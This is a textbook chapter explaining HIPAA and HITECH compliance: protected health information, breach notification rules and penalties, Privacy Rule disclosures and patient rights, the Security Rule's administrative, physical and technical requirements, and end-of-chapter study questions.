19.2 Introduction and Vocabulary Typical medical transactions are shown in Fig. 19.1. Employers enroll or disenroll employees into a health plan, and make premium payments for those employees. A health care provider submits a Health Plan Eligibility Inquiry to a patient’s health plan, to determine what the patient qualifies for and who to bill to. The nurse sends a health care claim to the insurance provider for bills to be paid, and may send a referral if the patient should see a specialist, undergo surgery or be admitted to a hospital. The referral is also sent to any specialist doctor or hospital, if appropriate. The personal health information that is protected under the HIPAA Privacy Rule is called Protected Health Information (PHI). Under the HIPAA Security Rule, PHI

Fig. 19.1  Typical medical transactions

348

19  Complying with HIPAA and HITECH

is stored in computers in electronic form is renamed Electronic Protected Health Information (EPHI). Note that the abbreviation is what is normally used; if you want to think of the P letter as Protected, Patient, Personal or Private, it does not really matter, since this data is all of those things! All parts of your health information are protected. Let’s consider a hypothetical case where you visit multiple times a doctor who specializes in cancer or a cancer center. That information alone could change your brilliant career or even your ability to gain health insurance (depending on current health laws). Therefore, every part of your medical treatment and medical bills are protected by HIPAA. Let us consider next that you obtain medical insurance through your work place, and you commute from a remote location (e.g., rural or long distance), or you work for a small business. Consider that your employer hears that someone from a specific zip code or with a specific area code visits a cancer center. That can uniquely identify you. Therefore, each part of your contact information and any other private information is protected. Figure 19.2 shows that all parts of your PHI are protected. Under HIPAA, the primary organizations that needed to adhere to the regulation were Covered Entities (CE), which consisted of health care providers, health plan organizations, and health care clearinghouses. Health clearinghouses are businesses that convert nonstandard medical transactions into HIPAA-standardized transactions. Business Associates (BA) consult for health care organizations by performing claims processing, transcription, billing and data analysis. Under HITECH, BAs are equally responsible and liable for disclosure [2]. All uses of PHI within Treatment, Payment and Operations (TPO) are protected. Health care Operations include administrative functions such as legal, quality improvement, training, certification, case management, financial and business planning aspects. Even organizations which maintain nurses’ offices need to be concerned. Thus, HIPAA/HITECH now applies widely. HIPAA is clear that a breach does not include unintentional or inadvertent disclosures by workforce members or authorized persons, when this access is made in

Fig. 19.2  Factors composing PHI

349

19.3  HITECH Breach Notification

good faith, is within workers’ authority, and does not result in additional disclosure or usage [7].

19.3 HITECH Breach Notification The HITECH Breach Notification Rule, passed in 2009, specifies how a CE/BA should notify individuals and agencies if a breach of information occurs. To prevent breaches, PHI shall be shredded or destroyed and disposed of properly and EPHI shall always be encrypted in a way that is approved by HHS. If a breach does occur, each affected patient needs to be notified within 60 days, although a documented, ongoing law enforcement investigation may delay the notification [7]. BAs must inform CEs of any breaches with minimal delay and at least within 60 days and shall provide similar details about the breach. Patient notification shall include a description of what happened, the date of the breach and its discovery, the type of information that was breached, steps the clients should take to protect themselves, and actions the CE is taking to investigate the breach, mitigate existing problems, and prevent new ones. The notification letter shall also provide contact information, for any questions. If 10 or more affected people cannot be notified, e.g., due to change of address, then the CE must post the breach on their website for 90 days or publish a notice in major regional media and include a toll-free number for patients to call. If more than 500 people were affected, the CE must also notify HHS as soon as possible, and inform local media. If fewer than 500 people were affected, the CE must notify HHS by 60 days after the end of the year. HIPAA established penalties and jail time for violators of the law. The imposed jail time was up to 1 year for “wrongful disclosure” of PHI/EPHI, up to 5 years if this wrongful disclosure was “committed under false pretenses,” and up to 10 years if the breach was performed “with intent to sell, achieve personal gain, or cause malicious harm.” HITECH increased the penalties to what is shown in Table 19.1. These fees are adjusted for inflation and thus change annually [8]. The jail time still applies mainly for cases of fraud and criminal intent. Breaches are seriously enforced! Concerning the CVS pharmacy breach, the FTC and Health and Human Services (HHS) each developed separate remediation Table 19.1  Penalties for HIPAA/HITECH violations (2022 fees) HITECH category CE/BA exercised reasonable diligence but did not learn about violation Violation is due to reasonable cause CE/BA demonstrated willful neglect but corrected violation CE/BA demonstrated willful neglect and took no corrective action within 30 days

Each violation $120–30,113 $1,205–60,226 $12,045–60,226 $60,226–1.8 million

Max $ per year $30,133 $120,452 $301,130 $1.8 million

350

19  Complying with HIPAA and HITECH

plans with CVS that included the development of a security plan, security policies, and an employee training program. The remediation plans also required independent audits and HHS monitoring. CVS paid $2.25 million in fines [4]. Blue Cross Blue Shield, which lost 57 disks of PHI, paid $1.5 million to Office of Civil Rights, incurred a 3-year remediation plan, and spent $17 million in investigation, notification, and protection expenses [5]. Parts of HITECH have been incorporated into the U.S. HIPAA Administrative Simplification [7], published by the Department of Health and Human Services (DHS), Office for Civil Rights. Penalties are documented in section §160.404 and breach notification is within Subpart D §164.400.

19.4 HIPAA Privacy Rule The Privacy Rule addresses patient privacy. It was originally written to be applicable regardless of whether or not the office used computers or not. The Privacy Rule is meant to be reasonable, and not cause major expenses such as architectural changes. Hard copy patient information shall be maintained in locked cabinets or destroyed via paper shredders. Doctors and nurses should maintain patient privacy by using shut or lock doors and keeping their voices down. Providers should maintain a clear desk policy so that patient information other than the patient being served is not visible. Computers should be protected by passwords and auto screen savers, to ensure that no patient information is divulged when a CE walks away from their terminal. Hospital patients are entitled to privacy curtains, but not necessarily private rooms or soundproof walls. It is also OK for doctors to talk to nurses at nurse stations about patient care. In summary, precautions shall be taken, but should not prevent regular patient care business. The Privacy Rule ensures that health care providers maintain policies and procedures regarding patient privacy. Providers must regularly review these policies and procedures, and update policies when new requirements emerge. Providers shall validate that these policies/procedures are consistently implemented throughout the organization. Some of those policies shall mandate that health information is not used for non-­ health purposes, including marketing [2, 3]. Workers shall have need-to-know and minimum necessary access to patient information, which is sufficient only to do their primary job. A data classification scheme, such as is defined in the Information Security chapter, documents permissions. Each CE organization shall name one person who is accountable for Privacy Rule compliance, and each full and part-time employee, volunteer, and contractor needs to be trained in privacy, sufficient to adhere to the law.

19.4  HIPAA Privacy Rule

351

19.4.1 Patient Privacy and Rights Subpart E of the HIPAA Administrative Simplification Regulation Text outlines privacy, disclosure and de-identification procedures [7]. Specific rights that are attributable to patients include: • Notification of breach of their PHI (Subpart D of HIPAA); • Disclosures where a patient has the opportunity to agree or object (§164.510); • Notice of Privacy Practices: informs patients how their information is used and protected (§164.520); • Rights to request privacy protection for PHI: limitations apply for emergency care and healthcare operations (§164.522); • Access of patients to PHI: limitations apply for psychotherapy, legal or research purposes, or is related to the Clinical Laboratory Improvements Amendment, or the PHI provides documentation about other persons (§164.524); • Amendment of PHI: Patients may be required to submit a written request, with reasoning, to change PHI, and shall be responded to within 60 days or extended to 90 days (§164.526); • Accounting of disclosures: Patients may request a list of disclosures for the previous six years, except that some disclosures need not be provided, related to healthcare operations, legal purposes, limited data sets, etc. (§164.528). Patients should know how their provider handles privacy, via a Notice of Privacy Practices (NPP). Health plans and health providers must provide their NPP to clients upon enrollment or on first service delivery, and both must request signed acknowledgment of receipt of the NPP. The NPP must be displayed prominently in the office, on any website, and copies should be available upon request. If privacy practices change, a revised NPP must be issued to clients within 60 days. When patients request access to PHI, the CE must provide this information within 30 days, or provide a written reason why it will take longer, within that 30-day timeframe. They then may delay an additional 30 days. The HHS takes this patient right very seriously, as the quote that begins the chapter indicates. (Note that proposed regulation proposes to reduce the time frames to 15 days [8]). While CEs may charge fees, they must be reasonable and cover only the costs of processing: labor, supplies and postage, as applicable. If the CE denies the request, the patient may appeal the request. 19.4.1.1 Disclosures CEs and BAs must track both allowed and unintended disclosures of patient information. CEs shall obtain contracts from BAs, which indicate that BAs are responsible for HIPAA/HITECH, will use the PII information only for the required and permitted purposes stated in the agreement, and that BAs will notify CEs of any breaches [8]. If the BA outsources any of the contracted work, similar contract

352

19  Complying with HIPAA and HITECH

agreements must be signed between BA and BA.  Disclosures are covered in the HIPAA Administrative Simplification Regulation Text, Subpart E, §164.500–520. Allowed disclosures include [3, 7]: Required Disclosure: Each patient shall be able to access their PHI, as noted above. In some cases, a parent, guardian or personal representative, such as next of kin, may require PHI. The Office of Civil Rights Enforcement, which is tasked with investigating violations of the Privacy Rule, may access PHI for suspected wrongdoing. Permitted Disclosure: PHI may be disclosed without patient authorization for public health authority, judicial proceedings, coroner/funerals, organ donation, approved research, military-related situations, government-provided benefits, worker’s compensation, domestic violence or abuse, and some law enforcement activities. The amount of disclosure should be the minimum necessary: for example for domestic violence, only treatments related to the violence are shared, and not the full medical history. Before PHI is provided, identity must be verified, for example by proof of identity/badge and documentation. Routine Disclosure: These PHI disclosures happen routinely, such as in regular treatment, payment or healthcare operations, including a referral to another health provider, as part of medical transcriptions, or to report births, deaths, communicable diseases and other vital statistics, or inform schools of immunization(s). These disclosures should be addressed in policies, procedures and forms to ensure that minimal information is provided in acceptable ways and the disclosure is documented. Authorization Required Disclosure: Under some circumstances, the CE must request permission from the patient to disclose PHI.  These disclosures may include: psychotherapy notes, marketing of information to the patient, sales of the patients’ information to a third party, and research purposes. In a few cases (e.g., research purposes) multiple authorizations may be joined into one compound authorization. CEs/Bas must honor patient-revoked authorizations, including authorization expiration dates. Research does have special requirements, such as approval from an IRB/privacy review board and statements of privacy to protect patients. CEs shall have reasonable criteria to review requests for these non-routine PHI disclosures, so that they may occur following a standardized review process. Incidental Disclosure: Some disclosures may be unavoidable in performing regular health functions. For example, a patient may overhear advice given to another patient in a hospital room or by a nurse’s desk. However, CEs shall take reasonable care that this is minimized but does not need to track such disclosures. Finally, some disclosures are not permitted, such as Inadvertent Disclosures and Breaches. Inadvertent disclosures include a PHI disclosed by mistake without authorization. These disclosures must be tracked, and may require notification. Examples of breaches include when a computer or backup tape/disks are stolen or a hacker breaks into a PHI database. Breaches always require Notification as described in a previous section.

19.4  HIPAA Privacy Rule

353

Fig. 19.3  Disclosure authorization form

Any person who falls outside of the list of permitted disclosures may obtain the PHI if the patient agrees and signs a release form, such as Fig. 19.3, indicating his or her approval. This includes the patient’s employer, a lawyer, another insurance company, another health care provider not involved in the patient’s health care, or any person outside of the health care system. If the patient agrees, the patient should get a copy of the authorization and the CE or BA must maintain the authorization for 6 years. Note that the one case where an employer is entitled to specific drug-­ related PHI is for a mandated drug test. 19.4.1.2 De-identification and Limited Data Sets Patient records that are de-identified are not consider individually identifiable health information, and can be processed for research, public health and healthcare operations without being subject to breach requirements. To achieve that status, the risk of re-identification must be statistically very small. Information that must be removed includes names (individual, employer and family members), geographical information (excluding state or permissible zip code manipulation), dates, contact information, social security and other account numbers, vehicle and device IDs, IP addresses, and biometric or facial images, etc. A re-identification method may use randomly-generated codes and code translation to re-identify a patient from a de-identified record. The re-identification algorithm cannot be guessably reversible and the mechanism to translate codes should be carefully controlled on a minimum-necessary basis. A limited data set is a de-identified file with no guessable method of reversal. The advantage of a limited data set is less opportunity for breach. When a covered entity shares a limited data set with a business associate, the CE must contract with the BA the permissible uses of the limited data set and limit distribution of this data (Fig. 19.4).

354

19  Complying with HIPAA and HITECH

Fig. 19.4  Example de-identified, or limited data set (with blocklist)

19.5 HIPAA Security Rule The Security Rule is required when computers are used in a CE/BA environment. To achieve that, the Security Rule recognizes that confidentiality, integrity and availability are each required to protect health information [2, 3]. With computerization, PHI becomes Electronic PHI (EPHI), the Minimum Necessary requirement translates into authentication and access control, and the tracking of disclosures is implemented using unique login credentials and transaction logging. Logs of medical transactions record who accessed or modified medical records, at what time and for what reason. This logging ensures nonrepudiation, making employees accountable for what they access and do to medical data. The goal of the regulation is that security is scalable, technology independent, and comprehensive. The regulation avoids specifying detailed technologies that are likely to change with time. However, the HIPAA Security Rule is also comprehensive in its security coverage. The HIPAA/HITECH Security Rule requirements are listed in Table  19.2 [7]. Each requirement is defined as Required (R) or Addressable (A). Required standards specify the precise implementation that is expected – there is no leeway in implementation. Addressable options allow for documented, alternative implementations that are effective in achieving the intent of the standard. Table 19.2 provides the actual HIPAA text for the Security Rule. The table has been slightly modified for readability: EPHI is abbreviated and full legal paragraph numbers have been removed and replaced with a general paragraph name. The Security Rule is divided into three sections: administrative, physical and technical security requirements. As you shall see, virtually everything this book covers is required by HIPAA/HITECH.

19.5.1 Administrative Requirements Administrative requirements include risk management, alarm/log monitoring, periodic policy review/audit, and personnel management. Risk management ensures that security costs correspond with risk: a hospital should spend more than a doctor’s office. Risk assessment should be accurate, thorough and implemented. The implementation requirement includes monitoring of computer and network logs, performing vulnerability assessments, and performing audits to ensure worker adherence to procedures and control effectiveness.

355

19.5  HIPAA Security Rule Table 19.2  Security rule requirements [7]

HIPAA administrative simplification text (Slightly modified for simpler reading) §164.308 Administrative safeguards. (1) Standard: Security management process. Implement policies and procedures to prevent, detect, contain, and correct security violations. (A) Risk analysis (Required). Conduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of EPHI held by the covered entity or business associate. (B) Risk management (Required). Implement security measures sufficient to reduce risks and vulnerabilities to a reasonable and appropriate level. (C) Sanction policy (Required). Apply appropriate sanctions against workforce members who fail to comply with the security policies and procedures of the covered entity or business associate. (D) Information system activity review (Required). Implement procedures to regularly review records of information system activity, such as audit logs, access reports, and security incident tracking reports. (2) Standard: Assigned security responsibility. Identify the security official who is responsible for the development and implementation of the policies and procedures required by this subpart for the covered entity or business associate. (3) Standard: Workforce security. Implement policies and procedures to ensure that all members of its workforce have appropriate access to electronic protected health information, as provided under paragraph (4) of this section, and to prevent those workforce members who do not have access under paragraph (4) of this section from obtaining access to EPHI. (A) Authorization and/or supervision (Addressable). Implement procedures for the authorization and/or supervision of workforce members who work with EPHI or in locations where it might be accessed. (B) Workforce clearance procedure (Addressable). Implement procedures to determine that the access of a workforce member to EPHI is appropriate. (C) Termination procedures (Addressable). Implement procedures for terminating access to EPHI when the employment of, or other arrangement with, a workforce member ends or as required by determinations made as specified in paragraph (3)(B) of this section. (4) Standard: Information access management. Implement policies and procedures for authorizing access to EPHI that are consistent with the applicable requirements of subpart E of this part. (A) Isolating health care clearinghouse functions (Required). If a health care clearinghouse is part of a larger organization, the clearinghouse must implement policies and procedures that protect the EPHI of the clearinghouse from unauthorized access by the larger organization. (B) Access authorization (Addressable). Implement policies and procedures for granting access to EPHI, for example, through access to a workstation, transaction, program, process, or other mechanism.

Required/ addressable (& Notes)

R

R R

R

A

A A

R

A

(continued)

356

19  Complying with HIPAA and HITECH

Table 19.2 (continued)

HIPAA administrative simplification text (Slightly modified for simpler reading) (C) Access establishment and modification (Addressable). Implement policies and procedures that, based upon the covered entity's or the business associate's access authorization policies, establish, document, review, and modify a user's right of access to a workstation, transaction, program, or process. (5) Standard: Security awareness and training. Implement a security awareness and training program for all members of its workforce (including management). (A) Security reminders (Addressable). Periodic security updates. (B) Protection from malicious software (Addressable). Procedures for guarding against, detecting, and reporting malicious software. (C) Log-in monitoring (Addressable). Procedures for monitoring log-in attempts and reporting discrepancies. (D) Password management (Addressable). Procedures for creating, changing, and safeguarding passwords. (6) Standard: Security incident procedures. Implement policies and procedures to address security incidents. Response and reporting (Required). Identify and respond to suspected or known security incidents; mitigate, to the extent practicable, harmful effects of security incidents that are known to the covered entity or business associate; and document security incidents and their outcomes. (7) Standard: Contingency plan. Establish (and implement as needed) policies and procedures for responding to an emergency or other occurrence (for example, fire, vandalism, system failure, and natural disaster) that damages systems that contain EPHI. (A) Data backup plan (Required). Establish and implement procedures to create and maintain retrievable exact copies of electronic protected health information. (B) Disaster recovery plan (Required). Establish (and implement as needed) procedures to restore any loss of data. (C) Emergency mode operation plan (Required). Establish (and implement as needed) procedures to enable continuation of critical business processes for protection of the security of EPHI while operating in emergency mode. (D) Testing and revision procedures (Addressable). Implement procedures for periodic testing and revision of contingency plans. (E) Applications and data criticality analysis (Addressable). Assess the relative criticality of specific applications and data in support of other contingency plan components. (8) Standard: Evaluation. Perform a periodic technical and nontechnical evaluation, based initially upon the standards implemented under this rule and, subsequently, in response to environmental or operational changes affecting the security of EPHI, that establishes the extent to which a covered entity’s or business associate’s security policies and procedures meet the requirements of this subpart.

Required/ addressable (& Notes) A

A A A A

R

R R R

A A

R

(continued)

357

19.5  HIPAA Security Rule Table 19.2 (continued)

HIPAA administrative simplification text (Slightly modified for simpler reading) (9)(A) Business associate contracts and other arrangements. A covered entity may permit a business associate to create, receive, maintain, or transmit EPHI on the covered entity’s behalf only if the covered entity obtains satisfactory assurances, in accordance with Organizational Requirements (§ 164.314), that the business associate will appropriately safeguard the information. A covered entity is not required to obtain such satisfactory assurances from a business associate that is a subcontractor. (B) A business associate may permit a business associate that is a subcontractor to create, receive, maintain, or transmit EPHI on its behalf only if the business associate obtains satisfactory assurances, in accordance with § 164.314, that the subcontractor will appropriately safeguard the information. (C) Written contract or other arrangement (Required). Document the satisfactory assurances required by paragraph (9)(A) or (9)(B) of this section through a written contract or other arrangement with the business associate that meets the applicable requirements of § 164.314. [amended 1/25/13] §164.310 Physical safeguards (a) Standard: Facility access controls. Implement policies and procedures to limit physical access to its electronic information systems and the facility or facilities in which they are housed, while ensuring that properly authorized access is allowed. (i) Contingency operations (Addressable). Establish (and implement as needed) procedures that allow facility access in support of restoration of lost data under the disaster recovery plan and emergency mode operations plan in the event of an emergency. (ii) Facility security plan (Addressable). Implement policies and procedures to safeguard the facility and the equipment therein from unauthorized physical access, tampering, and theft. (iii) Access control and validation procedures (Addressable). Implement procedures to control and validate a person's access to facilities based on their role or function, including visitor control, and control of access to software programs for testing and revision. (iv) Maintenance records (Addressable). Implement policies and procedures to document repairs and modifications to the physical components of a facility which are related to security (for example, hardware, walls, doors, and locks). (b) Standard: Workstation use. Implement policies and procedures that specify the proper functions to be performed, the manner in which those functions are to be performed, and the physical attributes of the surroundings of a specific workstation or class of workstation that can access EPHI. (c) Standard: Workstation security. Implement physical safeguards for all workstations that access electronic protected health information, to restrict access to authorized users.

Required/ addressable (& Notes)

R

A

A

A

A

R

R

(continued)

358

19  Complying with HIPAA and HITECH

Table 19.2 (continued)

HIPAA administrative simplification text (Slightly modified for simpler reading) (d) Standard: Device and media controls. Implement policies and procedures that govern the receipt and removal of hardware and electronic media that contain EPHI into and out of a facility, and the movement of these items within the facility. (i) Disposal (Required). Implement policies and procedures to address the final disposition of EPHI, and/or the hardware or electronic media on which it is stored. (ii) Media re-use (Required). Implement procedures for removal of EPHI from electronic media before the media are made available for re-use. (iii) Accountability (Addressable). Maintain a record of the movements of hardware and electronic media and any person responsible therefore. (iv) Data backup and storage (Addressable). Create a retrievable, exact copy of EPHI, when needed, before movement of equipment. [amended 1/25/13] §164.312 Technical safeguards (a)Standard: Access control. Implement technical policies and procedures for electronic information systems that maintain EPHI to allow access only to those persons or software programs that have been granted access rights as specified in Administrative Safeguards (§ 164.308(4)). (i) Unique user identification (Required). Assign a unique name and/or number for identifying and tracking user identity. (ii) Emergency access procedure (Required). Establish (and implement as needed) procedures for obtaining necessary EPHI during an emergency. (iii) Automatic logoff (Addressable). Implement electronic procedures that terminate an electronic session after a predetermined time of inactivity. (iv) Encryption and decryption (Addressable). Implement a mechanism to encrypt and decrypt EPHI. (b) Standard: Audit controls. Implement hardware, software, and/or procedural mechanisms that record and examine activity in information systems that contain or use EPHI. (c) Standard: Integrity. Implement policies and procedures to protect EPHI from improper alteration or destruction. Mechanism to authenticate EPHI (Addressable). Implement electronic mechanisms to corroborate that EPHI has not been altered or destroyed in an unauthorized manner. (d) Standard: Person or entity authentication. Implement procedures to verify that a person or entity seeking access to EPHI is the one claimed. (e) Standard: Transmission security. Implement technical security measures to guard against unauthorized access to EPHI that is being transmitted over an electronic communications network.

Required/ addressable (& Notes)

R

R A A

R R A A R

A

R

(continued)

19.5  HIPAA Security Rule

359

Table 19.2 (continued) Required/ addressable (& Notes) A

HIPAA administrative simplification text (Slightly modified for simpler reading) (i) Integrity controls (Addressable). Implement security measures to ensure that electronically transmitted EPHI is not improperly modified without detection until disposed of. A (ii) Encryption (Addressable). Implement a mechanism to encrypt EPHI whenever deemed appropriate. [68 FR 8376, Feb. 20, 2003, as amended at 78 FR 5694, Jan. 25, 2013] §164.314 Organizational requirements (a) Standard: Business associate contracts or other arrangements. The contract or other arrangement required by Administrative Safeguards (§ 164.308(9)(3)) must meet the requirements of paragraph (i), (ii), or (iii) of this section, as applicable. (i) Business associate contracts. The contract must provide that the business associate will— (A) Comply with the applicable requirements of this subpart; (B) In accordance with § 164.308(9)(2), ensure that any subcontractors that create, receive, maintain, or transmit EPHI on behalf of the business associate agree to comply with the applicable requirements of this subpart by entering into a contract or other arrangement that complies with this section; and (C) Report to the covered entity any security incident of which it becomes aware, including breaches of unsecured PHI as required by Notification Requirement § 164.410. (ii) Other arrangements. The covered entity is in compliance with paragraph (a) (1) of this section if it has another arrangement in place that meets the requirements of Uses and Disclosures § 164.504. (iii) Business associate contracts with subcontractors. The requirements of paragraphs (a)(i) and (a)(ii) of this section apply to the contract or other arrangement between a business associate and a subcontractor required by Administrative Safeguards (§ 164.308(9)(4)) in the same manner as such requirements apply to contracts or other arrangements between a covered entity and business associate. (b) Standard: Requirements for group health plans. Except when the only EPHI disclosed to a plan sponsor is disclosed pursuant to Uses and Disclosures (§ 164.504 or § 164.508), a group health plan must ensure that its plan documents provide that the plan sponsor will reasonably and appropriately safeguard EPHI created, received, maintained, or transmitted to or by the plan sponsor on behalf of the group health plan.

(continued)

360

19  Complying with HIPAA and HITECH

Table 19.2 (continued) Required/ addressable (& Notes) R

HIPAA administrative simplification text (Slightly modified for simpler reading) Implementation specifications (Required). The plan documents of the group health plan must be amended to incorporate provisions to require the plan sponsor to— (i) Implement administrative, physical, and technical safeguards that reasonably and appropriately protect the confidentiality, integrity, and availability of the EPHI that it creates, receives, maintains, or transmits on behalf of the group health plan; (ii) Ensure that the adequate separation required by Uses and Disclosures (§ 164.504) is supported by reasonable and appropriate security measures; (iii) Ensure that any agent to whom it provides this information agrees to implement reasonable and appropriate security measures to protect the information; and (iv) Report to the group health plan any security incident of which it becomes aware. [amended 1/25/13] §164.316 Policies and procedures and documentation requirements (a) Standard: Policies and procedures. Implement reasonable and appropriate policies and procedures to comply with the standards, implementation specifications, or other requirements of this subpart, taking into account those factors specified in Security standards: General rules (§ 164.306). A covered entity or business associate may change its policies and procedures at any time, provided that the changes are documented and are implemented in accordance with this subpart. (b) Standard: Documentation. (i) Maintain the policies and procedures implemented to comply with this subpart in written (which may be electronic) form; and (ii) If an action, activity or assessment is required by this subpart to be documented, maintain a written (which may be electronic) record of the action, activity, or assessment. (2) Implementation specifications: (i) Time limit (Required). Retain the documentation required by paragraph (b)(1) R of this section for 6 years from the date of its creation or the date when it last was in effect, whichever is later. R (ii) Availability (Required). Make documentation available to those persons responsible for implementing the procedures to which the documentation pertains. R (iii) Updates (Required). Review documentation periodically, and update as needed, in response to environmental or operational changes affecting the security of the EPHI. [amended 1/25/13].

A security official shall be allocated to be responsible for security policy and implementation. Workers should sign confidentiality agreements and be trained in policies and procedures; these workers must implement them or be disciplined. Workers must be periodically reminded of policies and security training, including creating good passwords and reporting malware and other potential concerns. Contractors must also sign confidentiality/HIPAA adherence agreements. Policies and procedures must be updated regularly to accommodate changes in the health care environment and operations, and shall be retained for 6 years after their creation or modification.

19.5  HIPAA Security Rule

361

Realizing ‘Minimum Necessary’ in a computer environment translates into documenting procedures to allocate permissions (access control) to EPHI, ensuring that permissions remain appropriately minimal as job functions change, supervising EPHI access, and terminating access when employment ends. Typically, a data owner (or staff manager) allocates permissions. A disaster will likely occur sometime, and can be caused by computer equipment failure or security breaches. Guidelines must be prepared to help employees deal with both inadvertent data loss and security incidents. These incidents must be handled appropriately and fully tracked. A contingency plan should indicate how data is normally backed up, how it can be restored following system (disk) failure, and how the organization will survive with minimal or no computer availability. Testing for such an eventuality is required. While this chapter is an overview of HIPAA requirements, an appropriate implementation of Administrative Security is more fully defined in Chap. 4 on risk, Chap. 5 on business continuity, Chap. 6 regarding policy, Chap. 7 describing information security, Chap. 12 on personnel, and Chap. 13 on incident response.

19.5.2 Physical Security Physical security is concerned with appropriate access to the health facility, to worker workstations and to organizational media. A facility security plan protects the facility from inappropriate access and theft, and considers when and where workers and patients may be present. Facility security shall also plan for emergency/continuity access and document equipment maintenance. To protect EPHI, appropriate access and acceptable use of workstations can be documented within an acceptable use plan. Since EPHI will often be viewable on terminal screens, shoulder surfing can be minimized through positioning of workstations and/or use of computer terminal hoods. Workers will occasionally leave their stations; the loss of EPHI through the viewing or theft of documents, laptops, and memory must be prevented. Protections, such as walls or locked rooms, can minimize exposure. EPHI may be exposed via sensitive paper documents, computers, terminals, backup copies, copy machines, and any other storage media used. Physical memory containing EPHI will eventually leave the facility, via disk backup, repair, reuse or disposal. Sensitive situations to consider include the handling of patients/visitors, the removal of equipment’s sensitive memories before repair, and erasure or damage of memories before equipment reuse or disposal. Finally, any hardware/media movement must be tracked and documented. Chapter 9 explores a more in-depth view of physical security.

362

19  Complying with HIPAA and HITECH

19.5.3 Technical Controls Technical controls ensure that computer equipment is accessed only by authorized individuals, and that EPHI is protected for confidentiality and integrity. Authentication controls include that each user has a unique login, that the user is identified accurately (through multi-factor or secure passwords), and that terminals timeout after a duration of no access, requiring relogin. Users are also accountable for their access to EPHI through transaction logging. Any emergency access methods should be well controlled. Computers containing EPHI must meet confidentiality and integrity goals for EPHI storage, archival and transmission. This is achieved using encryption and integrity (message digest) controls on the EPHI.  Potential attacks must also be logged. Regular maintenance includes patching of systems software and applications, and log review. Issues include determining for which devices logs should be monitored, which logs may indicate potential attack and how such attacks should be handled, and which logs should be archived for security purposes. Technical controls are further explained in Chap. 7 on data security and Chap. 8 on network security. Table 19.2 provides the actual HIPAA text for the Security Rule. The table has been slightly modified for readability: EPHI is abbreviated and full legal paragraph numbers have been removed and replaced with a general paragraph name.

19.6 Recent and Proposed Changes in Regulation While HIPAA/HITECH has been relatively stable for nearly a decade, changes have recently been implemented or are in process [9]: The HIPAA Safe Harbor Law (2021) helps to speed up breach prosecution, by requesting that HHS review security implementations only within 1 year of the breach, when calculating punitive penalties, and to decrease the duration and extent of the audit process when an organization has implemented best security practices. Twenty-first Century Cures Act (Cures Act) of 2016 enables research to more easily access and share medical information. Some proposed changes to HIPAA, currently in comment period, include [9]: • Enabling patients to inspect their PHI in person, take photographs of it, and transfer PHI to a personal health application. • CEs must post detailed fee prices for PHI access; some access may be mandated as free. • CEs must respond in 15 days to requests for information. • CEs may not be required to collect signed forms indicating receipt of NPPs. • CEs may provide PHI when a threat of harm is “seriously and reasonably foreseeable” and must provide PHI to other healthcare providers and plans upon patient request under HIPAA Right of Access.

19.7  Questions and Problems

363

19.7 Questions and Problems 1. Vocabulary. Match each meaning with the correct word. Security rule Privacy rule EPHI Required Addressable



Covered entity Business associate Medical identity theft HITECH HIPAA

Notice of privacy practices Required disclosure Permitted disclosure Routine disclosure Protected health information

(a) Information relating to any part of a person’s name, address, phone, medical condition, treatment and bills. (b) The aspect of HIPAA providing privacy/security requirements for all organizations working with health care, regardless of whether the health information is computerized or not. (c) The aspect of HIPAA listing privacy/security requirements for computerized systems containing health information. (d) Health providers must provide a statement to their patients indicating patient rights. (e) Patients are entitled to see their own medical records; in certain cases, legal guardians, parents and next of kin have access to this medical information. (f) Patient information may be communicated to other health care providers when referred; to report births, deaths, communicable diseases and other vital statistics; and to inform schools of immunizations. (g) An indication that a security rule requirement may be modified, if the rule’s intention is met. (h) Regulation requiring organizations to notify patients and HHS if a breach occurs. (i) The HIPAA name for a health care provider, health plan organization or healthcare clearinghouse. (j) The HIPAA name for consultant organizations, which may (e.g.,) process claims, transcribe records or analyze data and bills.

2. What is part of HIPAA/HITECH? Consider the following security practices, and determine whether or not they are part of HIPAA/HITECH. If they are, what rule (Security, Privacy, Notification) applies? If the Security Rule applies, which aspect: Administrative, Physical, or Technical security?

(a) A doctor should have a clear desk policy. (b) Computerized transactions which access patient records must be logged. (c) Patients are entitled to private rooms in a hospital. (d) If a breach of PHI/EPHI does occur, each affected patient should be notified. (e) PHI must be locked either in a locked room or in a locked cabinet. (f) Employees who divulge PHI are susceptible to dismissal.

364

19  Complying with HIPAA and HITECH

(g) A person should be designated as a chief of security to ensure the safety of EPHI. (h) Logs must be monitored on a regular basis. (i) An organization may be required to pay a maximum penalty of $1 million dollars for a breach. (j) There should be an incident response plan on how to handle a hacker attack. 3. Notice of Privacy Practice. Find a Notice of Privacy Practice for one of your doctors or a hospital near you. You may find it on-line or obtain a paper copy onsite. Summarize what the NPP says and how it protects you. 4. Audit. Develop an audit engagement plan to address two of HIPAA’s technical requirements. Consider not only verifying documented policy, but also implementation. An example audit engagement plan is shown in Table 15.2.

19.7.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study, Security Workbook and Requirements Document should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Fraud: Combating social engineering Security program development: Editing a policy manual for HIPAA HIPAA: Including privacy rule adherence to requirements document Application controls: Extending requirements preparation by planning for HIPAA security rule

Health first case study √ √ √ √

Other resources HIPAA slides or notes HIPAA slides or notes Security workbook HIPAA slides or notes Requirements document HIPAA slides or notes Requirements document

References 1. Pino LJ (2022) Eleven enforcement actions uphold patients’ rights under HIPAA, July 15, 2022. Health and Human Services (HHS). https://www.hhs.gov/about/news/2022/07/15/ eleven-­enforcement-­actions-­uphold-­patients-­rights-­under-­hipaa.html 2. Kempfert AE, Reed BD (2011) Health care reform in the United States: HITECH act and HIPAA privacy, security, and enforcement issues. FDCC Q 61(3):240–273 3. Dalgleish C (2009) Course: HIPAA compliance. Triton College, River Grove 4. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 148–187 5. Dowell MA (2012) HIPAA privacy and security HITECH act enforcement actions begin. Employee Benefit Plan Rev 66:9–11 6. Schmitt R (2014) Inside the medicare strike force. AARP Bull 55(9):10–12

References

365

